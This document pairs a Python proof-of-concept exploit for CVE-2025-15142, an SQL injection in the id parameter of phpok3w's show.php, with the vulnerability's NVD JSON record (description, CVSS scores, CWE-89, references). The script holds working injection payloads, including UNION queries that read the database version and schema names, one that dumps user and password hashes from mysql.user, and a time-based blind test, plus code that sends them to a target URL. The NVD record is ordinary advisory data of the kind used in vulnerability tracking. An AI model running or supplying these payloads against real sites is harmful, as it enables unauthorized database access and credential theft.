CVE-2025-15142

import requests # CVE-2025-15142 PoC - phpok3w SQL Injection in show.php # Target: phpok3w show.php file with vulnerable ID parameter target_url = "http://target.com/show.php" # SQL Injection Payloads for different extraction purposes # 1. Basic injection test - check if vulnerable payload_basic = "1' OR '1'='1" # 2. Database version extraction using UNION-based injection payload_db_version = "1' UNION SELECT NULL,@@version,NULL,NULL,NULL-- -" # 3. Database name extraction payload_db_name = "1' UNION SELECT NULL,database(),NULL,NULL,NULL-- -" # 4. User table credentials extraction (MySQL/MariaDB) payload_users = "1' UNION SELECT NULL,CONCAT(user,':',password),NULL,NULL,NULL FROM mysql.user-- -" # 5. All database names extraction payload_all_dbs = "1' UNION SELECT NULL,GROUP_CONCAT(schema_name),NULL,NULL,NULL FROM information_schema.schemata-- -" # 6. Time-based blind injection for data extraction payload_blind = "1' AND (SELECT IF(1=1,SLEEP(5),0))-- -" def test_vulnerability(): """Test basic SQL injection vulnerability""" params = {'id': payload_basic} try: response = requests.get(target_url, params=params, timeout=10) if response.status_code == 200: print(f"[+] Target appears to be vulnerable to SQL injection") return True except requests.RequestException as e: print(f"[-] Request failed: {e}") return False def extract_db_info(): """Extract database version and name""" version_params = {'id': payload_db_version} name_params = {'id': payload_db_name} try: version_resp = requests.get(target_url, params=version_params, timeout=10) name_resp = requests.get(target_url, params=name_params, timeout=10) print(f"[+] Database version: {version_resp.text}") print(f"[+] Database name: {name_resp.text}") except requests.RequestException as e: print(f"[-] Extraction failed: {e}") if __name__ == "__main__": print("CVE-2025-15142 phpok3w SQL Injection PoC") print("=" * 50) test_vulnerability()

{"cve": {"id": "CVE-2025-15142", "sourceIdentifier": "[email protected]", "published": "2025-12-28T16:15:50.900", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in 9786 phpok3w up to 901d96a06809fb28b17f3a4362c59e70411c933c. Impacted is an unknown function of the file show.php. The manipulation of the argument ID leads to sql injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://gitee.com/9786/phpok3w/issues/IDD1IZ", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.338520", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.338520", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.715574", "source": "[email protected]"}]}}